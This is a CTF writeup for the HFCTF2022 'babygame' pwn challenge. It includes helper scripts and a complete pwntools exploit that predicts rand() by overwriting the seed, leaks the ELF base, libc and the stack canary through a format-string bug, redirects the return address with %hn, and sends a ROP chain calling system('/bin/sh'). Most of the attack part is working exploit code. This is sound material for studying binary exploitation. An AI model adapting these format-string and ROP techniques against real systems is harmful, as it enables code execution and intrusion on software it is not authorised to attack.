[Original] [HFCTF2022] babygame
2022-4-28 18:28
What I learned
(1) The caller and the callee see the same canary value (on x86-64 glibc it is per-thread, read from fs:0x28, so a canary leaked in one frame is valid in another)
(2) A format-string write needs the address to modify placed on the stack in advance
1. babygame
Protections
IDA
main
From the stack frame we can see that srand's seed, v5, lies inside the region we can overwrite, so we can feed in a rand() sequence generated beforehand on Linux with the same seed (Windows and Linux produce different sequences for the same seed) and bypass the random-number check.
Beyond that, the stack still holds leftover pointers from the process, which we can use to leak the program's base address.
game
A simple random-number bypass; this is an entry-level 攻防世界 style problem.
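How the `test` file consumed by the exploit can be produced, as an added example (the writeup does not show the author's generator). It calls the local C library's `srand`/`rand` through ctypes, which is exactly the point of the remark above: the prediction is only valid when it is generated against the same rand() implementation as the target (glibc 2.31 here), so the answers must come from a Linux box and not from Windows. The seed 0x61616161 is an assumption standing in for whatever the name overflow writes over v5, the use of rand() % 3 is inferred from the three-valued table in the exploit, and the 0→1, 1→2, 2→0 reply table is the one hard-coded there.

```python
import ctypes


def load_libc():
    """Load the C library of the machine running this script. rand() is implementation
    specific (glibc: srand(1); rand() gives 1804289383, MSVC gives 41), so the sequence is
    only a valid prediction against a target using the same libc family."""
    for name in ('libc.so.6', None):   # None = the running process's own libc
        try:
            return ctypes.CDLL(name)
        except OSError:
            continue
    raise RuntimeError('no C library found')


def predicted_rounds(seed, rounds=100, modulus=3):
    """Replay srand(seed) followed by `rounds` calls to rand() % modulus: the game's choices.
    (rand() % 3 is an inference from the exploit's table, not shown in the writeup.)"""
    libc = load_libc()
    libc.srand(ctypes.c_uint(seed & 0xffffffff))
    return [libc.rand() % modulus for _ in range(rounds)]


def winning_move(computer_choice):
    """Reply table copied from the exploit: program plays 1 -> send 2, 2 -> send 0, 0 -> send 1."""
    return (computer_choice + 1) % 3


def answer_lines(seed, rounds=100):
    """The program's choice for each round, one per line, in the order the exploit replays them."""
    return [str(c) for c in predicted_rounds(seed, rounds)]


def write_answer_file(path, seed, rounds=100):
    """Write the file the exploit reads as 'test' (one digit per line)."""
    with open(path, 'w') as f:
        f.write('\n'.join(answer_lines(seed, rounds)) + '\n')


ASSUMED_SEED = 0x61616161   # 'aaaa' from the name overflow; an assumption, not taken from the binary


if __name__ == '__main__':
    write_answer_file('test', ASSUMED_SEED)
    first = predicted_rounds(ASSUMED_SEED, 10)
    print(first, [winning_move(c) for c in first])
```

Run it on the machine whose libc matches the target before launching the exploit; if the seed you actually control differs from the assumed one, change ASSUMED_SEED and regenerate.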
gold_finger
An obvious format-string vulnerability: it can leak libc and the canary, and the fmt write can modify stack contents (the return address and so on).
Exploit plan
Use the gold finger to leak libc and the canary and, in the same format string, change the return address so execution goes back into main; then, in main, put the leaked canary back in place while overflowing the stack to run the ROP chain.
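A worked model of the gold_finger payload, added here as an example rather than code from the original writeup. It builds the `%27$p%35$p%<pad>c%11$hn` string the same way the exploit does, copies it into a modelled x86-64 printf argument stack (slots 6 onwards overlap the input buffer, the usual SysV layout, which is an assumption), and runs a small printf simulator to check two things: the single byte placed after the NUL padding repoints slot 11 at the return-address slot, and `%hn` stores exactly the low 16 bits of the target. All addresses and the canary are constructed values, not leaks from the binary.

```python
import re

# Stack-slot numbers from the writeup's payload; the buffer layout is an assumption.
LEAK_SLOTS = (27, 35)   # a libc return address (atoi+20 in the writeup) and the canary
WRITE_SLOT = 11         # slot holding a stack pointer whose low byte we overwrite
BUF_SLOT = 6            # first printf argument that lands in the input buffer (SysV: 1-5 are registers)
LEAK_CHARS = 14 + 18    # "%p" of a 6-byte libc address and of an 8-byte canary, as the exploit assumes

FMT_TOKEN = re.compile(r'%(?:(\d+)\$)?(\d*)(hn|[pcn])')


def build_payload(target_low16, ret_slot_low_byte):
    """Same construction as the exploit: two leaks, a width pad, then a %hn write.
    %hn stores the character count mod 2**16, so wrap the pad instead of going negative."""
    pad = (target_low16 - LEAK_CHARS) % 0x10000
    if pad == 0:
        pad = 0x10000  # width 0 still prints one char; a full wrap keeps the count exact
    fmt = '%{}$p%{}$p%{}c%{}$hn'.format(LEAK_SLOTS[0], LEAK_SLOTS[1], pad, WRITE_SLOT)
    buf_off = (WRITE_SLOT - BUF_SLOT) * 8          # 0x28: where slot 11 starts inside the buffer
    assert len(fmt) <= buf_off, 'format string must end before the pointer byte'
    # NUL-pad so printf stops before the pointer byte, then overwrite only its low byte.
    return fmt.encode().ljust(buf_off, b'\x00') + bytes([ret_slot_low_byte])


def simulate_printf(fmt, stack):
    """Tiny printf model: stack[i] is positional argument i (one 8-byte slot).
    Supports %N$p, %Wc and %N$hn / %N$n. Returns (text, {address: value_written})."""
    out, writes, pos, next_arg = [], {}, 0, 1
    for m in FMT_TOKEN.finditer(fmt):
        out.append(fmt[pos:m.start()])
        pos = m.end()
        idx = int(m.group(1)) if m.group(1) else next_arg
        if not m.group(1):
            next_arg += 1
        width = int(m.group(2) or 0)
        conv = m.group(3)
        if conv == 'p':
            out.append(hex(stack.get(idx, 0)).rjust(width))
        elif conv == 'c':
            out.append('x'.rjust(width))    # only the length matters: max(width, 1) chars
        else:
            mask = 0xffff if conv == 'hn' else 0xffffffff
            writes[stack.get(idx, 0)] = len(''.join(out)) & mask
    out.append(fmt[pos:])
    return ''.join(out), writes


def deliver(payload, stack):
    """Copy the payload into the buffer slots byte by byte, as read() would, leaving the
    untouched tail of each slot intact, then run the format string up to its first NUL."""
    stack = dict(stack)
    for i in range(0, len(payload), 8):
        slot = BUF_SLOT + i // 8
        chunk = payload[i:i + 8]
        old = stack.get(slot, 0).to_bytes(8, 'little')
        stack[slot] = int.from_bytes(chunk + old[len(chunk):], 'little')
    fmt = payload.split(b'\x00', 1)[0].decode()
    return simulate_printf(fmt, stack)


# Constructed stand-ins for the real process (assumptions, not values leaked from babygame).
ELF_BASE = 0x555555554000
READ_ADDR = ELF_BASE + 0x14B6          # the exploit's target inside main
RET_SLOT = 0x7ffedeadbe68              # where gold_finger's return address lives; ends in 0x68
STACK = {
    WRITE_SLOT: 0x7ffedeadbe40,        # leftover stack pointer sharing its upper bytes with RET_SLOT
    LEAK_SLOTS[0]: 0x7f1234567890,     # 6-byte libc address -> 14 chars as %p
    LEAK_SLOTS[1]: 0x1234567890abcd00, # canary: low byte zero, top byte set -> 18 chars as %p
}


def run(target=READ_ADDR):
    """Build the payload for `target`, deliver it and return what printf printed and wrote."""
    payload = build_payload(target & 0xffff, RET_SLOT & 0xff)
    return deliver(payload, STACK)


if __name__ == '__main__':
    text, writes = run()
    print(text[:32], {hex(a): hex(v) for a, v in writes.items()})
```

Two caveats the model makes visible: the pad subtracts a fixed 32 characters, so if a leaked value prints with a different width (a canary whose top byte happens to be zero prints 16 characters, not 18) the stored value is off by that difference, and the write only lands where intended because slot 11 already held a stack pointer that shares its upper bytes with the return-address slot, which is why the byte after the NUL padding is enough.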
Exploit

```python
#!/usr/bin/python
# encoding: utf-8
# Python 2 / old pwntools: payloads are str and libc.search() is a generator with .next().
import sys
import string
from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64

context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'


def proof_of_work(sh):
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() == cipher,
                        string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)


def z():
    gdb.attach(r)


r = process('./babygame')
libc = ELF('./libc-2.31.so')

## leak_proc_base: overflow the name up to a leftover code pointer and read it back
pd = 0x108 * 'a' + 0x30 * 'a' + 'nameless' + 'nameless'
r.sendafter("Please input your name:", pd)
r.recvuntil('namelessnameless')
elfbase = u64(r.recv(6).ljust(8, '\x00')) - 0x1465
log.info('elfbase:' + hex(elfbase))

## set
read_addr = elfbase + 0x14B6

## load the rand() sequence pre-generated on Linux with the overwritten seed
f = open('test', 'r')
a = ['0'] * 100
for i in range(0, 100):
    line = f.readline()
    line = line[:-1]
    a[i] = str(line)
f.close()

count = 1
for i in range(0, 100):
    r.recvuntil('round ' + str(count))
    if a[i] == '1':
        r.sendline('2')
    if a[i] == '2':
        r.sendline('0')
    if a[i] == '0':
        r.sendline('1')
    count = count + 1

## golden_finger: leak libc (slot 27) and canary (slot 35), then %hn the low 16 bits
## of read_addr through the pointer in slot 11; the two %p already printed 14 + 18 = 32 chars
pd = '%27$p%35$p'
pd += '%{}c%11$hn'.format((read_addr & 0xffff) - 32)
## NUL-terminate before offset 0x28, then overwrite only the low byte of the slot-11 pointer
pd = pd.ljust(0x28, '\x00') + '\x68'
r.sendafter("Good luck to you.\n", pd)
libcbase = int(r.recv(14), 16) - (libc.sym['atoi'] + 20)
canary = int(r.recv(18), 16)
log.success('libcbase:' + hex(libcbase))
log.success('canary:' + hex(canary))
log.success('read_addr:' + hex(read_addr))

## set
system = libcbase + libc.sym['system']
pdt = libcbase + 0x23b72  ## pop_rdi_ret
ret = libcbase + 0x22679  ## ret, keeps the stack 16-byte aligned for system
bin_sh = libcbase + libc.search('/bin/sh\x00').next()
rop = p64(pdt) + p64(bin_sh) + p64(ret) + p64(system)
## back in main: refill the canary at its slot, skip saved rbp, then the ROP chain
pd = (0x120 - 0x18) * 'a' + p64(canary) + 0x18 * 'a' + rop
##z()
r.sendafter("Please input your name:", pd)
r.sendlineafter('round', str(1))
r.interactive()
```